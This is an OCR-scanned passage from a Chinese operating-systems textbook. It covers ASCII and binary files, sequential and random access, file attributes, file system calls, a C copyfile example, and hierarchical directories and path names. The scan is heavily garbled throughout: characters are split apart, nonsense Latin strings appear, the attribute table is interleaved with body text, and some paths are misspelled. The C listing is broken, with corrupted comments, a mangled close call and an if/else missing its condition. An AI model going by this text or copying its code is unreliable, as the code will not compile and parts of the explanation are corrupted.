普通 文件 一 般 分 为 ASCII 文 件 和 二 进 制 文件 。ASCII 文 件 由 多 行 正 文 组 成 。 在 某 些 系统 中 ， 每 行 用 
回 车 符 结束 ， 其 他 系统 则 用 换行 符 结 束 。 有 些 系 统 还 同时 采用 回 车 符 和 换行 符 (如 MS-DOS)。 文 件 中 
各 行 的 长 度 不 一 定 相 同 。 

ASCII 文 件 的 最 大 优势 是 可 以 显示 和 打印 ， 还 可 以 用 任何 文本 编辑 器 进行 编辑 。 再 者 ， 如 果 很 多 程序 
都 以 ASCII 文 件 作 为 输入 和 输出 ， 就 很 容易 把 一 个 程序 的 输出 作为 另 一 个 程序 的 输入 ， 如 shell 管 道 一 样 。 
(用 管道 实现 进程 间 通信 并 非 更 容易 ， 但 若 以 一 种 公认 的 标准 (如 ASCII 码 ) 来 表示 ， 则 更 易于 信息 翻译 。) 

其 他 与 ASCII 文 件 不 同 的 是 二 进 制 文件 。 打 印 出 来 的 二 进 制 文件 是 无 法 理解 的 、 充 满 混 乱 字符 的 一 
张 表 。 通 常 ， 二 进 制 文件 有 一 定 的 内 部 结构 ， 使 用 该 文件 的 程序 才 了 解 这 种 结构 。 

如 图 4-3a 是 一 个 简单 的 可 执行 二 进 制 文件 ， 它 取 自 某 个 早期 版 本 的 UNIX。 尽 管 这 个 文件 只 是 一 个 字 
节 序 列 ， 但 只 有 文件 的 格式 正确 时 ， 操 作 系 统 才 会 执行 这 个 文件 。 这 个 文件 有 五 个 段 : 文件 头 、 正 文 、 
数据 、 重 定位 位 及 符号 表 。 文 件 头 以 所 谓 的 魔 数 (magic number) 开始 ， 表 明 该 文件 是 一 个 可 执行 的 文 
件 〈 防 止 非 这 种 格式 的 文件 偶然 运行 )。 魔 数 后 面 是 文件 中 各 段 的 长 度 、 执 行 的 起 始 地 址 和 一 些 标志 位 。 
程序 本 身 的 正文 和 数据 在 文件 头 后 面 。 这 些 被 装 和 内存 ， 并 使 用 重 定位 位 重新 定位 。 符 号 表 则 用 于 调试 。 


入 口 点 
WML 





a) b) 
图 4-3 a) 一 个 可 执行 文件 ，b) 一 个 存档 文件 


二 进 制 文件 的 第 二 个 例子 是 UNIX 的 存档 文件 ， 它 由 已 编译 但 没有 链接 的 库 过 程 (模块 ) 组 合 而 成 。 
每 个 文件 以 模块 头 开始 ， 其 中 记录 了 名 称 、 创 建 日 期 、 所 有 者 、 保 护 码 和 文件 大 小 。 该 模块 头 与 可 执行 
文件 一 样 ， 也 都 是 二 进 制 数字 ， 打 印 输出 它们 毫 无 意义 。 

所 有 操作 系统 必须 至 少 能 够 识别 它们 自己 的 可 执行 文件 的 文件 类 型 ， 其 中 有 些 操作 系统 还 可 识别 更 
多 的 文件 类 型 。 一 种 老式 的 TOPS-20 操 作 系统 (用 于 DECsystem20 计 算 机 ) 甚至 可 检查 可 执行 文件 的 创 
建 时 间 ， 然 后 ， 它 可 以 找到 相应 的 源 文件 ， 看 它 在 二 进 制 文件 生成 后 是 否 被 修改 过 。 如 果 修 改过 ， 操 作 
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系统 自动 重新 编译 这 个 文件 。 在 UNIX 中 Mæ Eshelh ik A maket F. iX MERE A SEER AP AR 
用 固定 的 文件 扩展 名 ， 从 而 确定 哪个 源 程序 生成 哪个 二 进 制 文件 。 

如 果 用 户 执行 了 系统 设计 者 没有 考虑 到 的 某 种 操作 ， 这 种 强制 类 型 的 文件 有 可 能 会 引起 麻烦 。 比 如 
在 一 个 系统 中 ， 程 序 输出 文件 的 扩展 名 是 .dat (数据 文件 )， 若 用 户 写 一 个 格式 化 程序 ， 读 入 .c (CEF) 
文件 并 转换 它 ( 比 如 把 该 文件 转换 成 标准 的 首 行 缩 进 )， 再 把 转换 后 的 文件 以 .dat 类 型 输出 。 如 果 用 户 试 
图 用 C 编 译 器 来 编译 这 个 文件 ， 因 为 文件 扩展 名 不 对 ，C 编 译 器 会 拒绝 编译 。 若 想 把 file.dat 复 制 到 file.c 
也 不 行 ， 因 为 系统 会 认为 这 是 无 效 的 复制 (防止 用 户 错误 ) 。 

尽管 对 初学 者 而 言 ， 这 类 “保护 ”是 有 利 的 ， 但 一 些 有 经 验 的 用 户 却 感到 很 烦恼 ， 因 为 他 们 要 花 很 
多 精力 来 适应 操作 系统 对 合理 和 不 合理 操作 的 划分 。 
4.1.4 文件 访问 

早期 操作 系统 只 有 一 种 文件 访问 方式 : 顺序 访问 (sequential access)。 进 程 在 这 些 系统 中 可 从 头 按 顺 
序 读 取 文 件 的 全 部 字 节 或 记录 ， 但 不 能 跳 过 某 一 些 内 容 ， 也 不 能 不 按 顺 序 读 取 。 顺 序 访问 文件 是 可 以 返 
回 到 起 点 的 ， 需 要 时 可 多 次 读 取 该 文件 。 在 存储 介质 是 磁带 而 不 是 磁盘 时 ， 顺 序 访 问 文件 是 很 方便 的 。 

当 用 磁盘 来 存储 文件 时 ， 可 以 不 按 顺 序 地 读 取 文 件 中 的 字 节 或 记录 ， 或 者 按照 关键 字 而 不 是 位 置 来 
访问 记录 。 这 种 能 够 以 任何 次 序 读 取 其 中 字 节 或 记录 的 文件 称 作 随 机 访问 文件 (random access file) 。 许 
多 应 用 程序 需要 这 种 类 型 的 文件 。 : 

随机 访问 文件 对 很 多 应 用 程序 而 言 是 必 不 可 少 的 , 如 数据 库 系 统 。 如 果 乘 客 打 电 话 预订 某 航班 机 票 ， 
订 票 程序 必须 能 直接 访问 该 航班 记录 ， 而 不 必 先 读 出 其 他 航班 的 成 千 上 万 个 记录 。 

有 两 种 方法 可 以 指示 从 何 处 开始 读 取 文 件 。 一 种 是 每 次 read 操 作 都 给 出 开始 读 文 件 的 位 置 。 另 一 种 
是 用 一 个 特殊 的 seek 操 作 设置 当前 位 置 ， 在 seek 操 作 后 ， 从 这 个 当前 位 置 顺序 地 开始 读 文 件 。UNIX 和 
Windows 使 用 的 是 后 一 种 方法 。 




















m 性 含义 
4.1.5 文件 属性 保护 谁 可 以 访问 文件 ， 以 什么 方式 存 取 文 件 
文件 都 有 文件 名 和 数据 。 另 外 ， | 口令 访问 文件 需要 的 口令 





所 有 的 操作 系统 还 会 保存 其 他 与 文 | 创建 者 
件 相 关 的 信息 ， 如 文件 创建 的 日 期 ”| 所 有 者 
和 时 间 、 文 件 大 小 等 。 这 些 附 加 信 | 只 读 标志 
息 称 为 文件 属性 (attribute) ， 有 些 ee 
人 称 之 为 元 数据 (metadata), XF “上 存档 标志 
的 属性 在 不 同系 统 中 差别 很 大 。 一 ASCII/ 二 进 制 标志 
些 常用 的 属性 在 图 4-4 中 列 出 ， 但 还 ”| 随机 访问 标志 

存在 其 他 的 属性 。 没 有 一 个 系统 具 ”| 临时 标志 
有 所 有 这 些 属性 ， 但 每 个 属性 都 在 | 加 锁 标志 


创建 文件 者 的 ID 

当前 所 有 者 

0 表示 读 / 写 ，1 表 示 只 读 

0 表示 正常 ，1 表 示 不 在 列表 中 显示 

0 表示 普通 文件 ，1 表 示 系 统 文件 

0 表示 已 经 备份 ，1 表 示 需 要 备份 

0 表示 ASCII 码 文件 ，1 表 示 二 进 制 文件 
0 表示 只 允许 顺序 访问 ，1 表 示 随 机 访问 | 
0 表示 正常 ，! 表 示 进 程 退出 时 删除 该 文件 
0 表示 未 加 锁 ， 非 零 表 示 加 锁 


































































某 个 系统 中 采用 、 ERKE 一 个 记录 中 的 字 忆 数 
AAA me Socata. ROCER 每 个 记录 中 键 的 信 移 基 
neea . 键 的 长 度 键 字段 的 字 节 数 
们 指出 了 谁 可 以 访问 这 个 文件 ， 谁 创建 时 间 创建 文件 的 日 期 和 时 间 











不 能 访问 这 个 文件 。 有 各 种 不 同 的 “| 最 后 二 次 存 取 时 间 
文件 保护 方案 ， 以 后 会 讨论 其 中 一 | 最 后 一 次 修改 时 间 
些 保护 方案 。 在 一 些 系统 中 ， 用 户 。 | 当前 大 小 
必须 给 出 口令 才能 访问 文件 。 此 时 ， | 最 大 长 度 
口令 也 必 且 aS 
tee ge. He et Ee 
控制 或 启用 某 些 特殊 属性 。 例 如 ， 隐 藏 文件 位 表示 该 文件 不 在 文件 列表 中 出 现 。 存 档 标志 位 用 于 记录 文 
件 是 否 备份 过 ， 由 备份 程序 清除 该 标志 位 ， 若 文件 被 修改 ， 操 作 系 统 则 设置 该 标志 位 。 用 这 种 方法 ， 备 
份 程序 可 以 知道 哪些 文件 需要 备份 。 临 时 标志 表明 当 创建 该 文件 的 进程 终止 时 ， 文 件 会 被 自动 删除 。 
记录 长 度 、 键 的 位 置 和 键 的 长 度 等 字段 只 能 出 现在 用 关键 字 查找 记录 的 文件 里 ， 它 们 提供 了 查找 关 
键 字 所 需 的 信息 。 
不 同 的 时 间 字段 记录 了 文件 的 创建 时 间 、 最 近 一 次 访问 时 间 以 及 最 后 一 次 修改 时 间 ， 它 们 的 作用 不 


上 一 次 访问 文件 的 日 期 和 时 间 
上 一 次 修改 文件 的 日 期 和 时 间 
文件 的 字 节 数 | 




















文件 可 能 增长 到 的 字 节 数 
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同 。 例 如 ， 目 标 文 件 生成 后 被 修改 的 源 文件 需要 重新 编译 生成 目标 文件 。 这 些 字 段 提供 了 必要 的 信息 。 

当前 大 小 字段 指出 了 当前 的 文件 大 小 。 在 一 些 老 式 大 型 机 操作 系统 中 创建 文件 时 ， 要 给 出 文件 的 最 
大 长 度 ， 以 便 操作 系统 事先 按 最 大 长 度 留 出 存储 空间 。 工 作 站 和 个 人 计算 机 中 的 操作 系统 则 聪明 多 了 ， 
不 需要 这 一 点 提示 。 

4.1.6 文件 操作 

使 用 文件 的 目的 是 存储 信息 并 方便 以 后 的 检索 。 对 于 存储 和 检索 ， 不 同系 统 提供 了 不 同 的 操作 。 以 
下 是 与 文件 有 关 的 最 常用 的 一 些 系统 调用 : 

1) create。 创 建 不 包含 任何 数据 的 文件 。 该 调用 的 目的 是 表明 文件 即将 建立 ， 并 设置 文件 的 一 些 属性 。 

2) delete。 当 不 再 需要 某 个 文件 时 ， 必 须 删除 该 文件 以 释放 磁盘 空间 。 任 何 文件 系统 总 有 一 个 系统 
调用 用 来 删除 文件 。 

3) open。 在 使 用 文件 之 前 ， 必 须 先 打开 文件 。open 调 用 的 目的 是 : 把 文件 属性 和 磁盘 地 址 表 装 入 
内 存 ， 便 于 后 续 调用 的 快速 访问 。 

4) close。 访 问 结束 后 ， 不 再 需要 文件 属性 和 磁盘 地 址 ， 这 时 应 该 关闭 文件 以 释放 内 部 表 空 间 。 很 
多 系统 限制 进程 打开 文件 的 个 数 ， 以 鼓励 用 户 关 闭 不 再 使 用 的 文件 。 磁 盘 以 块 为 单位 写 入 ， 关闭 文件 时 ， 
写 入 该 文件 的 最 后 一 块 ， 即 使 这 个 块 还 没有 满 。 

5) read。 在 文件 中 读 取 数据 。 一 般 地 ， 读 取 的 数据 来 自 文件 的 当前 位 置 。 调 用 者 必须 指明 需要 读 
取 多 少数 据 ， 并 且 提 供 存放 这 些 数 据 的 缓冲 区 。 

6) write。 向 文件 写 数据 ， 写 操作 一 般 也 是 从 文件 当前 位 置 开 始 。 如 果 当 前 位 置 是 文件 末尾 ， 文 件 
长 度 增加 。 如 果 当 前 位 置 在 文件 中 间 ， 则 现 有 数据 被 覆盖 ， 并 且 永 远 丢 失 。 

7) append。 此 调用 是 write 的 限制 形式 ， 它 只 能 在 文件 末尾 添加 数据 。 若 系统 只 提供 最 小 系统 调用 
集合 ， 则 通常 没有 append。 很 多 系统 对 同一 操作 提供 了 多 种 实现 方法 ， 这 些 系统 中 有 时 有 append 调 用 。 

8) seek。 对 于 随机 访问 文件 ， 要 指定 从 何 处 开始 获取 数据 ， 通 常 的 方法 是 用 seek 系 统 调用 把 当前 
位 置 指针 指向 文件 中 特定 位 置 。seek 调 用 结束 后 ， 就 可 以 从 该 位 置 开始 读 写 数据 了 。 

9) get attributes。 进 程 运 行 常 需要 读 取 文 件 属性 。 例 如 ，UNIX 中 make 程 序 通 常用 于 管理 由 多 个 源 
文件 组 成 的 软件 开发 项 目 。 在 调用 make 时 ， 它 会 检查 全 部 源 文件 和 目标 文件 的 修改 时 间 ， 实现 最 小 编译 ， 
使 得 全 部 文件 都 为 最 新 版 本 。 为 达到 此 目的 ， 需 要 查找 文件 的 某 一 些 属性 ， 即 修改 时 间 。 

10) set attributes。 某 些 属 性 是 可 由 用 户 设置 的 ， 甚 至 是 在 文件 创建 之 后 ， 实 现 该 功能 的 是 set 
attributes 系 统 调用 。 保 护 模式 信息 是 一 个 典型 的 例子 ， 大 多 数 标志 也 属于 此 类 属性 。 

11) rename。 用 户 常常 要 改变 已 有 文件 的 名 字 ，rename 系 统 调用 用 于 这 一 目的 。 严 格 地 说 ，rename 
系统 调用 不 是 必需 的 ， 因 为 先 把 文件 复制 到 一 个 新 文件 中 ， 然 后 删除 原来 的 文件 ， 就 可 以 达到 同样 的 目的 。 
4.1.7 使 用 文件 系统 调用 的 一 个 示例 程序 

本 节 会 考察 一 个 简单 的 UNIX 程 序 ， 它 把 文件 从 源 文件 处 复制 到 目标 文件 处 。 程 序 清单 如 图 4-5 所 示 。 该 
程序 的 功能 很 简单 ， 甚 至 没有 考虑 出 错 报告 处 理 ， 但 它 给 出 了 有 关 文 件 的 系统 调用 是 怎样 工作 的 一 般 思路 。 

例如 ， 通 过 下 面 的 命令 行 可 以 调用 程序 copyfile: 

copyfile abc xyz 


把 文件 abc 复 制 到 xyz。 如 果 xyz 已 经 存在 ，abc 会 覆盖 它 。 否 则 ， 就 创建 它 。 程 序 调 用 必须 提供 两 个 参数 ， 
它们 都 是 合法 的 文件 名 。 第 一 个 是 输入 文件 ， 第 二 个 是 输出 文件 。 

在 程序 的 开头 是 四 个 卜 nclude 语 句 ， 它 们 把 大 量 的 定义 和 函数 原型 包含 在 这 个 程序 。 为 了 使 程序 遵 
守 相 应 的 国际 标准 ， 这 些 是 需要 的 ， 无 须 作 进一步 的 讨论 。 接 下 来 一 行 是 main 函 数 的 原型 ， 这 是 ANSI 
C 所 必需 的 ， 但 对 我 们 的 目的 而 言 ， 它 也 不 是 重点 。 

接 下 来 的 第 一 个 #define 语 句 是 一 个 宏 定 义 ， 它 把 BUF_SIZE 字 符 串 定义 为 一 个 宏 ， 其 数值 为 4096。 程 
序 会 读 写 若干 个 有 4096 个 字 节 的 块 。 类 似 地 ， 给 常数 一 个 名 称 而 且 用 这 一 名 称 代替 常数 是 一 种 良好 的 编程 
习惯 。 这 样 的 习惯 不 仅 使 程序 易 读 ， 而 且 使 程序 易于 维护 。 第 二 个 #define 语句 决定 谁 可 以 访问 输出 文件 。 

主 程序 名 为 main， 它 有 两 个 参数 : argc 和 argv。 当 调用 这 个 程序 时 ， 操 作 系统 提供 这 两 个 参数 。 第 
一 个 参数 表示 在 调用 该 程序 的 命令 行 中 包含 多 少 个 字符 串 ， 包 括 该 程序 名 。 它 应 该 是 3。 第 二 个 参数 是 
指向 程序 参数 的 指针 数组 。 在 上 面 的 示例 程序 中 ， 这 一 数组 的 元 素 应 该 包含 指向 下 列 值 的 指针 : 
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argv[0] = "copyfile" 

argv[1] = "abc" 

argv[2] = "xyz" 

正 是 通过 这 个 数组 ， 程 序 访问 其 参数 。 y 

声明 了 五 个 变量 。 前 面 两 个 (in_fd 和 out_fd) 用 来 保存 文件 描述 符 ， 即 打开 一 个 文件 时 返回 的 一 个 
小 整数 。 后 面 两 个 (rd_count 和 wt_count) 分 别 是 由 read 和 write 系统 调用 所 返回 的 字 节 计数 。 最 后 一 个 
(buffer) 是 用 于 保存 读 出 的 数据 以 及 提供 写 入 数据 的 缓冲 区 。 

第 一 行 实 际 语句 检查 argc， 看 它 是 否 是 3。 如 果 不 是 ， 它 以 状态 码 1 退出 。 任 何 非 0 的 状态 码 均 表 示 
出 错 。 在 本 程序 中 ， 状 态 码 是 唯一 的 出 错 报告 处 理 。 一 个 程序 的 产品 版 通常 会 打印 出 错 信息 。 


让 复制 文件 程序 ， 有 基本 的 错误 检查 和 错误 报告 */ 


#include <sys/types.h> /# 包括 必要 的 头 文件 */ 
#include <fcntl.h> 

#include <stdlib.h> 

#include <unistd.h> 


int main(int argc, char *argv[]); /ANSI 原 型 */ 


#define BUF_SIZE 4096 证 使 用 一 个 4096 字 节 大 小 的 缓冲 区 */ 
#define OUTPUT_MODE 0700 片 输出 文件 的 保护 位 */ 


int main(int argc, char *argv[]) 
{ 


int in_fd, out_fd, rd_count, wt_count; 
char buffer[BUF _ SIZE]; 


if (argc != 3) exit(1); /* 如果 argc 不 等 于 3， 语 法 错 */ 
履 打 开 输 入 文件 并 创建 输出 文件 */ 


in_fd = open(argv[1], O_RDONLY); /* 文件 */ 
if (in_fd < 0) exit(2); /* ROS petra. 退出 */ 
out_fd = creat(argv[2], OUTPUT_MODE); /* 创建 目标 文件 */ 
if (out_fd < 0) exit(3); > WRZE EK OE, GY */ 
I GEARS fill */ 
while (TRUE) { ‘ 
rd_count = read(in_fd, buffer, BUF _SIZE); /* 读 一 块 数据 */ 
if (rd_count <= 0) break; 上 # 如 果 文 件 结束 或 读 时 出 错 ， 退 出 循环 */ 
wt_count = write(out_fd, buffer, rd_count); /* 写 数据 */ 
if (wt_count <= 0) exit(4); /* wt_count <=0 是 一 个 错误 */ 
} 


* ASCE */ 
close(in_fd); 
l t_fd); 
De 产 没有 读 取 错误 浊 
exit(0); 
else 


exit(5); /* 有 读 取 错 发 生 #/ 





图 4-5 复制 文件 的 一 个 简单 程序 


接着 我 们 试图 打开 源 文件 并 创建 目标 文件 。 如 果 源 文件 成 功 打 开 ， 系 统 会 给 in_fd 赋 予 一 个 小 的 整 
数 ， 用 以 标识 源 文件 。 后 续 的 调用 必须 引用 这 个 整数 ， 使 系统 知道 需要 的 是 哪 一 个 文件 。 类 似 地 ， 如 果 
目标 文件 也 成 功 地 创建 了 ，out_fd 会 被 赋予 一 个 标识 用 的 值 。create 的 第 二 个 变量 是 设置 保护 模式 。 如 果 
打开 或 创建 文件 失败 ， 对 应 的 文件 描述 符 被 设 为 1， 程序 带 着 错误 码 退 出 。 

接 下 来 是 用 来 复制 文件 的 循环 。 一 开始 试图 读 出 4KB 数据 到 buffer 中 。 它 通过 调用 库 过 程 read 来 
完成 这 项 工作 ， 该 过 程 实际 激活 了 read 系 统 调用 。 第 一 个 参数 标识 文件 ， 第 二 个 参数 指定 缓冲 区 ， 第 三 
个 参数 指定 读 出 多 少 字 节 。 赋 予 rd_count 的 字 节 数 是 实际 所 读 出 的 字 节 数 。 通 常 这 个 数 是 4096， 除 非 剩 
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余 字 节 数 比 这 个 数 少 。 当 到 达 文 件 尾部 时 ， 该 参数 的 值 是 0。 如 果 rd_count 是 零 或 负数 ， 复 制 工作 就 不 能 
再 进行 下 去 ， 所 以 执行 break 语 句 ， 用 以 中 断 循环 (否则 就 无 法 结束 了 ) 。 

调用 write 把 缓冲 区 的 内 容 输出 到 目标 文件 中 去 。 同 read 类 似 ， 第 一 个 参数 标识 文件 ， 第 二 个 参数 指 
定 缓冲 区 ， 第 三 个 参数 指定 写 入 多 少 字 节 。 注 意 字 节 计 数 是 实际 读 出 的 字 节 数 ， 不 是 BUF_SIZE。 这 一 
点 是 很 重要 的 ， 因 为 最 后 一 个 缓冲 区 中 的 数据 大 小 一 般 不 会 是 4096， 除 非 文件 长 度 碰巧 是 4KB 的 倍数 。 

当 整 个 文件 处 理 完 时 ， 超 出 文件 尾部 的 首次 调用 会 把 0 值 返回 给 rd_count ， 这 样 ， 程 序 会 退出 循环 。 
此 时 ， 关 闭 两 个 文件 ， 程 序 退 出 并 附 有 正常 完成 的 状态 码 。 

尽管 Windows 的 系统 调用 与 UNIX 的 系统 调用 不 同 ， 但 是 Windows 程 序 复制 文件 的 命令 行 的 一 般 结 
构 与 图 4-5 中 的 相当 类 似 。 我 们 将 在 第 11 章 中 考察 Windows 8 的 系统 调用 。 


4.2 目录 


文件 系统 通常 提供 目录 或 文件 夹 用 于 记录 文件 的 位 置 ， 在 很 多 系统 中 目录 本 身 也 是 文件 。 本 节 讨 论 
目录 、 目 录 的 组 成 、 目 录 的 特性 和 可 以 对 目录 进行 的 操作 。 


4.2.1 一 级 目录 系统 

目录 系统 的 最 简单 形式 是 在 一 个 目录 中 包含 所 有 的 文件 。 这 有 时 称 为 根 目录 ， 但 是 由 于 只 有 一 个 目 
录 ， 所 以 其 名 称 并 不 重要 。 在 早期 的 个 人 计算 机 中 ， 这 种 系统 很 普遍 ， 部 分 原因 是 因为 只 有 一 个 用 户 。 
有 趣 的 是 ， 世 界 第 一 台 超 级 计算 机 CDC 6600 对 于 所 有 的 文件 也 只 有 一 个 目录 ， 尽 管 该 机 器 同时 被 许多 
用 户 使 用 。 这 样 决策 毫 无 疑问 是 为 了 简化 软件 设计 。 

一 个 单 层 目录 系统 的 例子 如 图 4-6 所 示 。 该 目 


-一 根 目 局 
录 中 有 四 个 文件 。 这 一 设计 的 优点 在 于 简单 ， 并 üti 
且 能 够 快速 定位 文件 一 一 事实 上 只 有 一 个 地 方 要 
查看 。 这 种 目录 系统 经 常用 于 简单 的 嵌入 式 装置 WOO 
中 ， 诸 如 电话 、 数 码 相 机 以 及 一 些 便 携 式 音乐 播 图 4-6 含有 四 个 文件 的 单 层 目录 系统 
放 器 等 。 
4.2.2 层次 目录 系统 


对 于 简单 的 特殊 应 用 而 言 ， 单 层 目 录 是 合适 的 ( 单 层 目录 其 至 用 在 了 第 一 代 个 人 计算 机 中 )， 但 是 现 
在 的 用 户 有 着 数 以 千 计 的 文件 ， 如 果 所 有 的 文件 
都 在 一 个 目录 中 ， 寻 找 文件 就 很 困难 。 这 样 ， 就 
需要 有 一 种 方式 将 相关 的 文件 组 合 在 一 起 。 例 如 ， 
某 个 教授 可 能 有 多 组 文件 ， 第 一 组 文件 是 为 了 一 
门 课 程 而 写作 的 ， 第 二 组 文件 包含 了 学 生 为 另 一 
门 课程 所 提交 的 程序 ， 第 三 组 文件 是 他 构造 的 一 
个 高 级 编译 -写作 系统 的 代码 ， 而 第 四 组 文件 是 奖 
学 金 建议 书 ， 还 有 其 他 与 电子 邮件 、 短 会 、 正 在 
写作 的 文章 、 游 戏 等 有 关 的 文件 。 

这 里 所 需要 的 是 层次 结构 〈 即 一 个 目录 树 ) 。 
通过 这 种 方式 ， 可 以 用 很 多 目录 把 文件 以 自然 的 方 图 4-7 层次 目录 系统 
式 分 组 。 进 而 ， 如 果 多 个 用 户 分 享 同一 个 文件 服务 
器 , 如 许多 公司 的 网 络 系 统 , 每 个 用 户 可 以 为 自己 的 目录 树 拥有 自己 的 私人 根 目录 。 这 种 方式 如 图 4-7 所 示 ， 
其 中 ， 根 目录 含有 目录 A、B 和 C， 分 别 属 于 不 同 用 户 ， 其 中 有 两 个 用 户 为 他 们 的 项 目 创建 了 子 目 录 。 

用 户 可 以 创建 任意 数量 的 子 目录 ， 这 为 用 户 组 织 其 工作 提供 了 强大 的 结构 化 工具 。 因 此 ， 几 乎 所 有 
现代 文件 系统 都 是 用 这 个 方式 组 织 的 。 


4.2.3 路 径 名 
用 目录 树 组 织 文件 系统 时 ， 需 要 有 某 种 方法 指明 文件 名 。 常 用 的 方法 有 两 种 。 第 一 种 是 ， 每 个 文件 
都 赋予 一 个 绝对 路 径 名 (absolute path name) ， 它 由 从 根 目录 到 文件 的 路 径 组 成 。 例 如 ， 路 径 
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/usr/ast/mailbox 表 示 根 目录 中 有 子 目录 usr， 而 usr 中 又 有 子 目 录 ast， 文 件 mailbox 就 在 子 目录 ast 下 。 绝 对 
路 径 名 一 定 从 根 目录 开始 ， 且 是 唯一 的 。 在 UNIX 中 ， 路 径 各 部 分 之 间 用 “/” 分 隔 。 在 Windows 中 ， 分 
隔 符 是 人 " 。 在 MULTICS 中 是 “>"。 这 样 在 这 三 个 系统 中 同样 的 路 径 名 按 如 下 形式 写成 : 

Windows \usr\ast\mailbox 

UNIX /usr/ast/mailbox 

MULTICS >usr>ast>mailbox 
不 管 采用 哪 种 分 隔 符 ， 如 果 路 径 名 的 第 一 个 字符 是 分 隔 符 ， 则 这 个 路 径 就 是 绝对 路 径 。 

另 一 种 指定 文件 名 的 方法 是 使 用 相对 路 径 名 (relative path name) 。 它 常 和 工作 目录 (working 
directory) (也 称 作 当前 目录 (current directory)) 一 起 使 用 。 用 户 可 以 指定 一 个 目录 作为 当前 工作 目录 。 
这 时 ， 所 有 的 不 从 根 目录 开始 的 路 径 名 都 是 相对 于 工作 目录 的 。 例 如 ， 如 果 当 前 的 工作 目录 是 /usr/ast， 
则 绝对 路 径 名 为 /usr/ast/mailbox 的 文件 可 以 直接 用 mailbox 来 引用 。 也 就 是 说 ， 如 果 工 作 目 录 是 /usr/ast， 
则 UNIX 命 令 


cp /usr/ast/mailbox /usr/ast/mailbox.bak 


和 命令 


cp mailbox mailbox.bak 


具有 相同 的 含义 。 相 对 路 径 往往 更 方便 ， 而 它 实 现 的 功能 和 绝对 路 径 完全 相同 。 

一 些 程序 需要 访问 某 个 特定 文件 ， 而 不 考虑 当前 目录 是 什么 。 这 时 ， 应 该 采用 绝对 路 径 名 。 比 如 ， 
一 个 检查 拼写 的 程序 在 其 工作 时 读 文件 /usr/lib/dictionary， 因 为 它 可 能 事先 不 知道 当前 目录 ， 所 以 就 采 
用 完整 的 绝对 路 径 名 。 不 论 当 前 的 工作 目录 是 什么 ， 绝 对 路 径 名 总 能 正常 工作 。 

当然 ， 若 这 个 检查 拼写 的 程序 要 从 目录 /usr/lib 中 读 很 多 文件 ， 可 以 用 另 一 种 方法 ， 即 执行 一 个 系统 
调用 把 该 程序 的 工作 目录 切换 到 /usrlib ， 然 后 只 需 用 dictionary 作 为 open 的 第 一 个 参数 。 通 过 显 式 地 改 
变 工作 目录 ， 可 以 知道 该 程序 在 目录 树 中 的 确切 位 置 ， 进 而 可 以 采用 相对 路 径 名 。 

每 个 进程 都 有 自己 的 工作 目录 ， 这 样 在 进程 改变 工作 目录 并 退出 后 ， 其 他 进程 不 会 受到 影响 ， 文 件 
系统 中 也 不 会 有 改变 的 痕迹 。 对 进程 而 言 ， 切 换 工 作 目 录 是 安全 的 ， 所 以 只 要 需要 ， 就 可 以 改变 当前 工 
作 目 录 。 但 是 ， 如 果 改 变 了 库 过 程 的 工作 目录 ， 并 且 工 作 完毕 之 后 没有 修改 回去 ， 则 其 他 程序 有 可 能 无 
法 正常 运行 ， 因 为 它们 关于 当前 目录 的 假设 已 经 失效 。 所 以 库 过 程 很 少 改变 工作 目录 ， 若 非 改 不 可 ， 必 
定 要 在 返回 之 前 改 回 到 原 有 的 工作 目录 。 

支持 层次 目录 结构 的 大 多 数 操作 系统 在 每 个 目录 中 有 两 个 特殊 的 目录 项 “.” 和 “.”， 当 读 作 “dot” 
和 “dotdot”。dot 指 当前 目录 ，dotdot 指 其 父 目录 (在 根 目录 中 例外 ， 在 根 目 录 中 它 指向 自己 )。 要 了 解 
怎样 使 用 它们 ， 请 考虑 图 4-8 中 的 UNIX 目 录 树 。 一 个 进程 的 工作 目录 是 /usr/ast， 它 可 采用 “..” 沿 树 向 
上 。 例 如 ， 可 用 命令 

cp ../lib/dictionary . 

把 文件 usVlib/dictionary 复 制 到 自己 的 目录 下 。 第 一 个 路 径 告诉 系统 上 漳 (到 usr 目 录 )， 然 后 向 下 到 lib 目 
录 ， 找 到 dictionary 文 件 。 

第 二 个 参数 (.) 指定 当前 目录 。 当 cp 命令 用 目录 名 (包括 “.”) 作为 最 后 一 个 参数 时 ， 则 把 全 部 的 
文件 复制 到 该 目录 中 。 当 然 ， 对 于 上 述 复制 ， 键 入 

cp /usrlib/dictionary . . 

是 更 常用 的 方法 。 用 户 这 里 采用 “.” 可 以 避免 键入 两 次 dictionary 。 无 论 如 何 ， 键 入 

cp /usr/lib/dictionary dictionary 

也 可 正常 工作 ， 就 像 键入 


cp /usr/lib/dictionary /usr/ast/dictionary 


一 样 。 所 有 这 些 命令 都 完成 同样 的 工作 。 
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tmp 


—— /Jusr/jim 





图 4-8 UNIX 目 录 树 


4.2.4 目录 操作 

不 同系 统 中 管理 目录 的 系统 调用 的 差别 比 管理 文件 的 系统 调用 的 差别 大 。 为 了 了 解 这 些 系统 调用 有 
哪些 及 它们 怎样 工作 ， 下 面 给 出 一 个 例子 〈 取 自 UNIX ) 。 

1) create。 创 建 目录 。 除 了 目录 项 “.” 和 “..” 外 ， 目 录 内 容 为 空 。 目 录 项 “.” 和 “..” 是 系统 自 
动 放 在 目录 中 的 (有 了 时 通过 mkdir 程 序 完 成 )。 

2) delete。 删 除 目录 。 只 有 空 目 录 可 删除 。 只 包含 目录 项 “.” 和 “..” 的 目录 被 认为 是 空 目 录 ， 这 
两 个 目录 项 通常 不 能 删除 。 

3) opendir。 目 录 内 容 可 被 读 取 。 例 如 ， 为 列 出 目录 中 全 部 文件 ， 程 序 必 须 先 打开 该 目录 ， 然 后 读 
其 中 全 部 文件 的 文件 名 。 与 打开 和 读 文件 相同 ， 在 读 目录 前 ， 必 须 打 开 目 录 。 

4) closedir。 读 目录 结束 后 ， 应 关闭 目录 以 释放 内 部 表 空 间 。 

5) readdir。 系 统 调用 readdir 返 回 打开 目录 的 下 一 个 目录 项 。 以 前 也 采用 read 系 统 调 用 来 读 目 录 ， 
但 这 方法 有 一 个 缺点 : 程序 员 必 须 了 解 和 处 理 目 录 的 内 部 结构 。 相 反 ， 不 论 采 用 哪 一 种 目录 结构 ， 
readdir 总 是 以 标准 格式 返回 一 个 目录 项 。 

6) rename。 在 很 多 方面 目录 和 文件 都 相似 。 文 件 可 换 名 ， 目 录 也 可 以 。 

7) link。 链 接 技术 允许 在 多 个 目录 中 出 现 同一 个 文件 。 这 个 系统 调用 指定 一 个 存在 的 文件 和 一 个 路 
